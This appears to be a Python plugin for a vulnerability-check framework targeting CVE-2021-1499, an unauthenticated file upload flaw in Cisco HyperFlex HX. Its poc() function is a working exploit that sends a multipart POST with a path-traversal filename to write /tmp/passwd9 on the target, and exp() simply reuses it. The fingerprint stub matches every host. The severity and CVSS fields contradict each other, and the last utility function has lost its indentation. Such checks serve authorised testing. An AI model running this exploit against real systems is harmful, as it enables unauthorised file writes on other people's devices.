import requests
# Vuln Base Info
def info():
    """Return the static metadata record describing this check.

    The dict is what ``poc`` attaches under ``result["info"]`` on a hit; the
    framework reads its keys (author, name, description, severity, references,
    classification, metadata, tags) verbatim.

    NOTE(review): ``severity`` says "medium" while ``cvss-metrics`` encodes a
    C:H/I:H/A:H vector (which would score critical) and ``cvss-score`` is left
    empty. One of the two is wrong; reconcile both against the NVD entry
    linked in ``references`` rather than trusting either value here.
    """
    classification = {
        "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "cvss-score": "",
        "cve-id": "CVE-2021-1499",
        "cwe-id": "CWE-306",
    }
    references = [
        "https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/",
        "https://nvd.nist.gov/vuln/detail/CVE-2021-1499",
    ]
    # "intrusive" is deliberate: the check writes a file on a vulnerable target.
    tags = ["cve", "cve2021", "cisco", "fileupload", "intrusive"]
    description = (
        "A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform "
        "could allow an unauthenticated, remote attacker to upload files to an affected device. "
        "This vulnerability is due to missing authentication for the upload function. "
        "An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. "
        "A successful exploit could allow the attacker to upload files to the affected device "
        "with the permissions of the tomcat8 user."
    )
    record = {
        "author": "cckuailong",
        "name": "Cisco HyperFlex HX Data Platform - File Upload Vulnerability",
        "description": description,
        "severity": "medium",
        "references": references,
        "classification": classification,
        "metadata": {"vuln-target": ""},
        "tags": tags,
    }
    return record
# Vendor Fingerprint
def fingerprint(url):
    """Vendor fingerprint stub that always reports a match.

    No request is sent and ``url`` is not inspected, so every target is
    treated as a Cisco HyperFlex host. Because ``poc`` is intrusive (it writes
    a file on a vulnerable device), callers must not rely on this function to
    narrow the set of hosts the check is fired at.
    """
    matched = True
    return matched
# Proof of Concept
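def poc(url):
    """Probe ``url`` for CVE-2021-1499 (unauthenticated upload on Cisco HyperFlex HX).

    Sends an unauthenticated multipart POST to ``/upload`` whose part filename
    carries a ``../`` traversal to ``/tmp/passwd9``. The target is reported as
    vulnerable when it answers 200 with a JSON body that echoes the written
    path.

    WARNING: this check is intrusive. A vulnerable device really writes
    ``/tmp/passwd9`` (with the tomcat8 user's permissions) and nothing here
    removes it again. Run it only against systems you are authorised to test
    and clean the artifact up afterwards.

    Args:
        url: Target base URL or bare host; normalised by ``format_url``.

    Returns:
        dict that always carries ``success`` (bool). On a hit it also carries
        ``info`` (the vulnerability metadata) and ``payload`` (the URL hit).
    """
    # "success" is set up front so a non-matching response returns
    # {"success": False} rather than an empty dict.
    result = {"success": False}
    try:
        url = format_url(url)
        path = "/upload"
        method = "POST"
        # Boundary as advertised in the Content-Type header. The delimiter
        # lines inside the body are "--" + boundary (RFC 2046); deriving them
        # here keeps header and body from drifting apart.
        boundary = "---------------------------253855577425106594691130420583"
        delimiter = "--" + boundary
        # Multipart lines are CRLF-terminated and the part headers must be
        # separated from the part body by an empty line; build the body
        # explicitly instead of relying on a triple-quoted literal's newlines.
        data = "\r\n".join([
            delimiter,
            'Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9"',
            "Content-Type: application/json",
            "",
            "MyPasswdNewData->/api/tomcat",
            delimiter + "--",
            "",
        ])
        headers = {
            "Accept": "*/*",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "multipart/form-data; boundary=" + boundary,
        }
        # verify=False: appliances commonly run self-signed certificates. It
        # also means this request can be intercepted; acceptable for a PoC only.
        resp0 = requests.request(
            method=method,
            url=url + path,
            data=data,
            headers=headers,
            timeout=10,
            verify=False,
            allow_redirects=False,
        )
        confirmed = (
            resp0.status_code == 200
            and "application/json" in str(resp0.headers)
            and '{"result":' in resp0.text
            and "filename:" in resp0.text
            and "/tmp/passwd9" in resp0.text
        )
        if confirmed:
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path
    except requests.RequestException:
        # Connection/timeout/HTTP-level failure: report "not confirmed" rather
        # than raising. Anything else is a programming error and propagates,
        # unlike the former bare except which hid it.
        result["success"] = False
    return result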
# Exploit, can be same with poc()
def exp(url):
    """Exploit entry point.

    Delegates to ``poc`` unchanged: the proof of concept already performs the
    upload, so there is no separate exploitation step. Carries the same
    intrusive side effect (a file written on a vulnerable target).
    """
    outcome = poc(url)
    return outcome
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url